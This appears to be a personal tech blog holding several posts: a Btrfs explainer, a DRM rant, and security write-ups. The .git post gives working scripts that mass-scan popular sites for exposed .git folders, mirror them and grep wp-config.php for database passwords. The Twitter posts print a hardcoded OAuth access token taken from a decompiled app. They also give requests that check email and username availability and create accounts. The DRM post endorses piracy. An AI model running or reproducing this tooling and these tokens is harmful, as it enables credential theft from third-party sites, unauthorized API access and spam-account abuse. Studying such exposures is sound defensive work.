ixchi

thoughts of a guy who loves computers a little too much

Finding .git folders

The Git version control system stores all of its data about current and past revisions of files in a hidden folder called .git. By convention, information such as passwords should not be committed to Git; it belongs in environment variables or other configuration methods instead. However, due to poor programming practices and general developer laziness, even on major software platforms, it is common for sensitive information to end up in the repository.

Most sane web server configurations block access to hidden directories and files; Apache, for example, denies access to .htaccess files by default. However, it seems that many do not deny access to .git folders.

When a server allows listing all files in a directory, you can use a tool to download all files contained within that folder.

Mirroring A Website

Common Linux utilities such as wget allow for mirroring a website with a single command. With a list of popular websites, you can check and mirror a great number of them incredibly quickly.
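
For a single site, one such command is all it takes; a minimal sketch against a hypothetical host looks like this:

# Recursively download the exposed .git folder without climbing up to the parent directory.
wget -r --no-parent http://example.com/.git/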

A simple bash script can automate this across a list of websites. Here is one that takes a single entry from such a list (rank and domain), checks whether a .git folder exists, and downloads the directory if possible.


#!/bin/bash

# Expects a single argument of the form "rank domain", e.g. "1 example.com".
IFS=' ' read -r -a array <<< "$1"

echo "[${array[0]}] Checking ${array[1]}"

# Request .git/HEAD and capture only the HTTP status code.
STATUSCODE=$(curl -L --silent --output /dev/null --write-out "%{http_code}" --max-time 5 "http://${array[1]}/.git/HEAD")

# If HEAD exists, recursively mirror the whole .git directory.
if test "$STATUSCODE" = 200; then
        echo "${array[0]} Got 200 on ${array[1]}"
        wget -r --no-parent --connect-timeout=5 "http://${array[1]}/.git/"
fi
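
To drive the script across a whole list, I fed it one line at a time in parallel. A sketch of how that can look, assuming the list is a rank,domain CSV saved as top-1m.csv and the script above is saved as check-git.sh (both names are just placeholders):

# Convert "rank,domain" lines into "rank domain" and run up to ten checks at once.
tr ',' ' ' < top-1m.csv | head -n 30000 | xargs -P 10 -I{} ./check-git.sh "{}"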

I ran this script on the Alexa top million sites. This yielded a surprising number of sites with .git directories.

Cleaning Results

Many websites return a 200 status code even when the page itself says it was not found. Additionally, a downloaded .git folder does not immediately give you the source code; the working tree still has to be restored from it.

It is fairly easy to clean up the results with a few simple commands. Again, a simple bash script can automate this.

#!/bin/bash

# Remove the directory listing pages that wget saved alongside the real files.
find . -name '*index.html*' -type f -delete

for D in "./"*
do
        # Only keep directories where we actually got a .git folder with a HEAD.
        if test -f "$D/.git/HEAD"
        then
                echo "$D"
                (
                        cd "$D" || exit
                        # Rebuild the working tree from the downloaded repository.
                        git reset --hard HEAD
                        if [ $? -eq 0 ]; then
                                cd ..
                                mv "$D" ../valid/
                        fi
                )
        fi
done

This script removes any HTML files that would interfere with Git, checks that each downloaded .git folder contains a HEAD, restores the working tree from the repository, and finally moves the code into a new folder where I can do further analysis.

Analyzing Results

I only ran my script through about 30,000 sites, which turned up six WordPress installs complete with their wp-config.php files. These configuration files contain the database username and password along with the authentication keys and salts. Sites that did not run WordPress showed up as well, and most of them still exposed database connection information.
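
Once everything is sitting in the valid/ folder, spotting those files is a one-liner; a rough sketch (the search term is just one obvious example):

# List downloaded sites whose wp-config.php exposes database credentials.
grep -rl --include=wp-config.php "DB_PASSWORD" valid/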

While I could connect to these servers and export or dump the databases, I would not be able to do so in good conscience (and, of course, I do not wish to commit a crime).

Conclusion

A surprising number of websites have publicly accessible and indexable .git folders. With this, one could download a copy of the source code, and more often than not retrieve confidential information such as database passwords or salts.

Systems administrators absolutely must deny access to hidden files and folders to prevent similar attacks from being performed on websites.
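
A single rule covering anything that starts with a dot is usually enough. As a minimal sketch, an nginx server block could include something like this (Apache has equivalent directives):

# Refuse requests for any hidden file or directory, including /.git/.
location ~ /\. {
    deny all;
}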

Note: I do not suggest that running these scripts is a good idea. I did all of this for purely educational reasons. After briefly looking at some of the code obtained, I purged any remaining files from my servers and did not disclose any information about the sites.

Btrfs

Retrieving data from a storage device is fairly simple, assuming you know which track and sector the data is stored on.

However, it is simply impossible for a person to remember all of these positions. A modern hard drive can store 8x10¹² individual bits of data!

An Intro To Filesystems

To solve the issue of remembering where files are on a disk, we have filesystems. One of the original filesystems is FAT, the File Allocation Table. Although it was originally designed for floppy disks, it was used from DOS through Windows ME, and it still lives on today.

A filesystem is just a fancy term for a big catalog of where files are. It stores the location of the beginning and end of each file on the drive. Now that we can look up this data, we can easily open any file.

FAT is just one of many filesystems that exist. Because computers were so limited when FAT was conceived, it had to do the bare minimum to work correctly as efficiently as possible, and it did this well.

Modern computers have significantly quicker disk write speeds, vastly larger quantities of RAM, and incredibly fast CPUs. With these, we introduced journaling filesystems.

Journaling Filesystems

If you were to unplug a computer using a FAT filesystem while it was writing or moving files, it would be left in an inconsistent state: the files might have moved, and the catalog may or may not have been updated. These situations often lead to data loss, as the system has no effective method of recovering from them.

NTFS, the filesystem in use by Windows today, is a journaled filesystem. The ext4 filesystem used by a great number of Linux installations is a journaled filesystem. Mac OS X uses HFS+ with journaling (HFSJ), again a journaled filesystem.

By journaling, or saving a log of all of the changes being made, a system can replay events to determine the current state of the drive. If data was left in an unknown state, it can scan just a small area and determine what still needs to be done.

However, journaling filesystems are not perfect at preventing data loss. They are simply much better than non-journaled filesystems, and they recover from sudden failures faster.

Journaling does absolutely nothing in the case of sudden storage failure. In the event that a hard drive or flash drive completely stops working, there is little that can be done to recover the data.

RAID

As data storage becomes less expensive, we can introduce tools such as RAID, a redundant array of independent disks. By storing at least two copies of all your data and filesystem information over two or more drives, a sudden drive failure will be less of a disaster. Even though one drive is no longer operational, the second drive contains all of your data. While this does not replace backups, it makes recovering a much faster operation.

There are different levels of RAID, which describe how the data is distributed across the drives. RAID0 is the least safe, because there is no redundancy at all; its advantage is that the drives are pooled together, so you can store single files larger than any one drive. RAID1 mirrors your data, keeping a complete copy on a second drive. RAID6 stores two drives' worth of parity, allowing any two drives in an array of four or more to fail without data loss. There are a few other levels, but they are either uncommon or combinations of the above.

RAID undoubtedly has its own issues. If data silently becomes corrupted on one drive, the array has no way of knowing which copy is correct and may replace the good data with the bad. Hardware RAID controllers may fail and leave data nearly impossible to recover. You may also have to bring the RAID system offline in order to perform data recovery.

As computers continue to evolve, new technologies are invented that can utilize new features to solve previous problems.

Btrfs

Btrfs is a relatively new filesystem that was designed to fix many of these issues. Btrfs can be used in a fashion similar to RAID with multiple drives, or it may be used on a single drive. Unlike RAID, it does not just store the file; it also stores a checksum of what the data should be.

Data Integrity

A checksum is a function performed on a set of data that returns a mostly unique and repeatable representation of this file or information. Changing even a single bit of data will yield an entirely different result. They are used frequently throughout programs in order to verify that there has not been data corruption or that the data has not been tampered with.

Here's an example of what checksumming data looks like.
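
A minimal command-line sketch of the idea, leaning on Python's zlib since coreutils does not ship a standalone CRC-32 tool:

#!/bin/bash

# Print the CRC-32 of a string as eight hex digits.
crc32() {
        python3 -c 'import sys, zlib; print(f"{zlib.crc32(sys.argv[1].encode()):08x}")' "$1"
}

crc32 "hello world"   # one checksum
crc32 "hello worle"   # change a single letter and the checksum is completely different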

With 4 billion possible combinations, the output is nearly always a different, unpredictable result, and the same input will always return the same output.

Now that this checksum is stored, a computer can determine when a file has changed from what it should be. Assuming your data is stored in at least a RAID1-like configuration, it can restore the copy that matches the checksum, instead of being uncertain about which copy is correct.

Advantages over RAID

Btrfs also allows far more flexibility than RAID. A RAID1 configuration requires identically sized disks if you want to use the drives' full capacity. I don't always have matched pairs of same-capacity drives, and sacrificing disk space for data safety is neither economical nor practical. With Btrfs, I can create something similar to a RAID1 array with at least two drives, but with any number of differently sized drives.
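
Creating an array like that is a single command. A sketch, assuming three drives named /dev/sdb through /dev/sdd and a mount point of /mnt/data (both are just examples):

# Keep two copies of all data (-d) and metadata (-m), spread across any mix of drive sizes.
mkfs.btrfs -d raid1 -m raid1 /dev/sdb /dev/sdc /dev/sdd
mount /dev/sdb /mnt/data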

My current Btrfs array has five drives in it: two 2TB drives and three 1TB drives. Btrfs intelligently places every piece of data and metadata on two different drives. If any drive were to fail, I would simply buy a replacement and tell Btrfs to replace the old drive with the new one.
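
That replacement is also a single command. A sketch, again with made-up device names and assuming the array is mounted at /mnt/data:

# Copy the failing drive's data onto the new drive, then check on the progress.
btrfs replace start /dev/sdc /dev/sde /mnt/data
btrfs replace status /mnt/data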

Btrfs offers transparent compression, meaning that data is compressed as it is written to the drive and decompressed as it is read. While this uses more CPU, it can save significant amounts of disk space without any additional work.
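
Compression is just a mount option; a sketch using the same hypothetical devices (lzo is one of the supported algorithms):

# Transparently compress everything written to the filesystem.
mount -o compress=lzo /dev/sdb /mnt/data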

There are still many other features, such as subvolumes, subvolume quotas, data deduplication, snapshots, and others. All of these make it an excellent filesystem choice.
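
Subvolumes and snapshots in particular take only a command each; a sketch with example paths:

# Create a subvolume for backups, then take a read-only snapshot of it.
btrfs subvolume create /mnt/data/backups
btrfs subvolume snapshot -r /mnt/data/backups /mnt/data/backups-snap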

My Experience

My initial setup went fairly well, and has been working perfectly since. I have subvolumes to separate working data from backups and enabled transparent compression to save some disk space. Unfortunately, data deduplication requires more RAM to successfully manage than I have available.

My one complaint so far is that determining free disk space is difficult. Unlike ext4, I can't just run df -h /dev/sda and get a percent full.

Running df reports that I have used 3.0TiB of data and have 2.8TiB free. Running Btrfs' own df-like tool reports that I have only used 1.47TiB of data. A rough estimate suggests that I have less than 1.4TiB free.
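
The Btrfs-specific tools are the ones that give the real picture; assuming the array is mounted at /mnt/data, they look like this:

# Show how space is allocated and used per profile (data, metadata, system).
btrfs filesystem df /mnt/data
btrfs filesystem usage /mnt/data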

Conclusion

As Btrfs is a newer filesystem, some data recovery tools may not work well with it. It also isn't supported on all platforms yet. While the developers claim it is stable, it has not gone through the same time trials as other filesystems have.

Companies such as Facebook and Jolla among various others have adopted Btrfs for use in their production environments. Some NAS devices have Btrfs support, if you wish to enable it.

With my current experience, I would recommend using Btrfs if you have proper backups of all your data and wish to make sure your data is always available and always correct. While I don't expect to encounter any issues with data integrity, being prepared is always better than the alternative.

If you wish to look into it more or learn how to use it, the Btrfs Wiki is an excellent source of updated and accurate information.

Piracy Is Your Fault: Why DRM Is Bad

I just tried to purchase a TV series online. It took just two clicks to give them my money, $21 for a season. Eager to watch this series, I clicked play. The video started to load, but then, an error occurred!

"There is a problem with your Flash player"

While I don't like Flash Player for many, many, many, many reasons, I usually don't have many issues with it. It told me to reset my license files, and gave me a link to do so, and so I did. I restarted my browser, just like it asked me to. And I got the same error message. There have been posts on various forums with the same issue. One user posted a reply from an official Google support representative.

Thanks for contacting Google. After further investigation, we have confirmed that this is out side of our scope as this is not currently supported, you may want to refer to Ubuntu and Adobe for further help.

While I don't use Ubuntu, the issue still stands. Google is relying on technologies they cannot support in all circumstances, yet charging people for it.

I had first tried playing this video in Safari, so I decided to try it in Firefox. Now the error message told me to install Chrome and the Chrome Movies & TV app. I've been attempting to move Google out of my life; I certainly don't need any more of their services installed on my machines. I migrated over to my Windows desktop and tried Microsoft Edge, the fancy new Internet Explorer replacement, and then Firefox. All had the same result: the video simply would not play.

At this point, I got a refund on my purchase. I didn't want to have to deal with troubleshooting something that should just work.

I then purchased the same series from a different company, and it instantly started to play after my purchase. However, I can only play it on computers or devices with iTunes installed. This excludes two out of the three devices I primarily use.

While it does work, the first thing I saw upon playing it was an advertisement. Why would anyone pay for something and then have to watch advertisements? It is part of the reason Netflix has been so much more popular than Hulu.

This whole process has made me extremely wary of ever purchasing media online again. It is strange that I can spend money on something under the impression that I will own it, when in reality I have no way to verify that it will even play on my devices, and that the media I can play only while connected to the Internet comes laced with advertisements.

The alternative to legally purchasing media is piracy, most commonly done through torrenting. Using something like Popcorn Time, I can stream any movie or TV show to any media player on any device with just a few clicks. There is no DRM, there are no restrictions, and there aren't any advertisements. When the alternative that costs money has far more downsides, it is quite understandable why people do the less legal thing.

Not only do I no longer have to worry about compatibility, but I will have this media for life (no DRM), and it will work on any device (I can simply convert it to any format I wish). I can store this media however and wherever I wish, without relying on "cloud" services to provide it to me at some later date.

While I'm still watching this TV series, I tried to look up where I can legally obtain DRM-free media. As it turns out, for anything mainstream it is essentially impossible! Even physical media such as Blu-rays has DRM, and with such DRM, people who physically own the discs can be locked out of their own media. Many small publishers release their media DRM free, but for any major TV series or movie, there is simply no option.

This is part of the reason that, even with such harsh punishments, people are willing to get media via piracy: what they purchase is not really theirs and often does not work, yet they still want it. It is also why Netflix is so successful: it just works and is relatively inexpensive. If there were more effective and more consumer-oriented ways to purchase media, I am certain that people would be happier to pay for it. Until such a thing happens, piracy is still going to be an issue.

Availability of Short Twitter Handles

Somewhat recently, I wrote a post about signing up for Twitter accounts using their private API. I also talked about how there were endpoints for checking username availability. These endpoints have no rate limiting, which enables us to do many fun things. One such thing is checking over 2,000,000 handles to see if they were still available.

On Twitter, short handles are a coveted thing. There are not many of them, and most have been taken. There are only 50,653 possible three-character handles, and every one of them is claimed. Twitter allows 37 possible characters in a handle: letters (26), numbers (10), and the underscore (1).

The number of possible handles of a given length is simply 37 raised to that length.
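
Shell arithmetic is enough to check the math:

$ echo $((37**3))
50653
$ echo $((37**4))
1874161
$ echo $((37**5))
69343957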

There are 1,874,161 four character handles, quite a jump up from three characters. Again, however, all of these have been registered. Scanning through all of these took quite a while longer, but it was still doable.

Unfortunately, there are 69,343,957 possible five-character handles, which would take days to scan through, something I am certain Twitter would not appreciate. To see what was available, I first started with a dictionary; there were no real words available. I then used a leaked password list to get potential handles that would not be entirely random, but also not real words. In total, this was 249,992 items to try, a somewhat reasonable number. Of these, only 14,482 were available.

If you need a short Twitter handle, there are plenty left on the list I collected.

As time goes on, I am sure that these handles will dry up and Twitter will finally be forced to purge inactive accounts.

Registering accounts using the Twitter API

Twitter uses an API for everything. Many people have seen its limitations, such as third-party clients not being able to get favorites on Tweets, or the cap of 100,000 user tokens per client. This API has many hidden methods and functions that most developers will never see, even though they are very easy to find. Official first-party tokens have access to many methods, which you can find using an endpoint designed to show rate-limiting information. Today, I'm going to be talking about a very specific type of API request: registering new accounts.

All of the following information and tokens have been pulled from Twitter for Windows, which I decompiled with JetBrains dotPeek.

Update as of August 2015: With .NET Native code, it is no longer possible to decompile Windows apps with these tools with such ease.

Tokens

Twitter uses OAuth for authenticating everything. There are hardcoded OAuth tokens for checking username availability and completing the registration. These tokens can be found in Twitter.OAuth.OAuthConstants. They are encoded as byte arrays offset by some number, which can very easily be undone with a simple program. The offset does not seem to have any clear origin. My best guess is that the tokens are stored as offset byte arrays so that people cannot simply search the binary for a matching string, but it does not seem to help much.
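
Undoing it is just a matter of subtracting the offset from every byte. A sketch of the idea, with a made-up offset and byte array rather than the real values:

#!/bin/bash

# Placeholder values; the real offset and byte arrays come from Twitter.OAuth.OAuthConstants.
OFFSET=10
BYTES=(126 121 117 111 120)

# Subtract the offset from each byte and print it as a character ("token" here).
for b in "${BYTES[@]}"; do
        printf "\\$(printf '%03o' $((b - OFFSET)))"
done
echo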

Here is where things start to get interesting. If you look at Twitter's scheme for OAuth tokens, you can find the user ID at the start. For example, the signup access token is 537705597-lH08BZJKhd1iEgm0o3DYd0vcp8e7eOskzUjVNbSd. This belongs to a user with the ID of 537705597. Twitter internally uses an account named @cupb1rdtre3 to register all Twitter for Windows accounts. It is a locked account, but thanks to our access tokens, we can see what's inside!
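
Pulling the ID out of a token is trivial:

$ echo "537705597-lH08BZJKhd1iEgm0o3DYd0vcp8e7eOskzUjVNbSd" | cut -d- -f1
537705597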

A Strange Account

My favorite tool for sending raw requests to the Twitter API is called twurl, a free Ruby gem published by Twitter for debugging API calls. After manually adding these tokens to its configuration file, I can start sending requests authorized as that account.

To see the account's most recent Tweets, you can run something like twurl /1.1/statuses/user_timeline.json?user_id=537705597. Using a lovely tool called jq, I can filter and pretty print this in my terminal window. We can filter this information down to just the Tweet text and created_at time using twurl /1.1/statuses/user_timeline.json?user_id=537705597 | jq '.[] | {text: .text, created_at: .created_at}'. Here are a few Tweets from the account. If you want to see the rest, just run the command yourself.

{
  "text": "hi I'm @batuhan_katirci and looking for internship in Turkey!",
  "created_at": "Tue May 05 05:50:40 +0000 2015"
}
{
  "text": "I will never understand this account - A dog",
  "created_at": "Thu Apr 02 23:50:01 +0000 2015"
}
{
  "text": "boop",
  "created_at": "Tue Mar 17 21:45:32 +0000 2015"
}
{
  "text": "Might want to fix your security...",
  "created_at": "Mon Mar 16 22:09:52 +0000 2015"
}

Checking Account Availability

Now that we have tokens that are authorized to run registration functions, we can check if usernames, email addresses, etc. are in use.

Again, I am using twurl to fetch things. After a quick look at Twitter.Services.SignupServices in Twitter-Win8.exe, we can easily identify the endpoint for checking availability. It is https://api.twitter.com/i/users/email_available.json for email addresses, and https://api.twitter.com/i/users/username_available.json for usernames. Each endpoint requires an email or username parameter, respectively.

Here is a sample request checking for my (already in use) email address.

$ twurl /i/users/email_available.json?email=example@ghc.li | jq '.'
{
  "valid": false,
  "msg": "Email has already been taken."
}

Using these endpoints, someone could create a tool that tells you whether a not-found page on Twitter means the account no longer exists or was merely deactivated.
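
The username endpoint works the same way; for example (the handle here is arbitrary, and I am assuming the response has the same valid/msg shape as the email one):

$ twurl "/i/users/username_available.json?username=jack" | jq '.'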

Creating Accounts

Now that we can check if usernames or email addresses have already been used, we can use an API endpoint to actually create a new account.

Again, looking at SignupServices, we can find the endpoint for creating a new account: https://api.twitter.com/1.1/account/create.json. Unlike the other methods mentioned above, we need to send a POST request. Normally, you would add -X POST to the twurl command to do this; however, because we are sending form data to create the account, POST is implied and the flag is not needed.

By looking at the Signup function we can determine which parameters are needed. The required fields are as follows:

Parameter      Description                                   Example
screen_name    Your Twitter handle, which must be unused.    GregCordover
email          Your email address, which must be unused.     example@ghc.li
password       The account password.                         a_cool_password
name           A display name for the account.               Greg Cordover

If you do not include a screen_name, you will be given an account name based on your name and random numbers.

There are other, optional parameters, and you can look through the code to see what they are and how they work.

An example of the request needed looks like this: twurl -d 'email=example2@ghc.li' -d 'screen_name=ademo12345' -d 'name=A Demo Account' -d 'password=myawesomepassword' /1.1/account/create.json (yes, this is real information, you can log into this account!).

Conclusion

You now have the information needed to create your own Twitter accounts using their API with their tokens. Use this power for good, not evil. We certainly do not need any other spam accounts!

If you have any questions about the material contained in this document, feel free to throw me an email or send me a Tweet!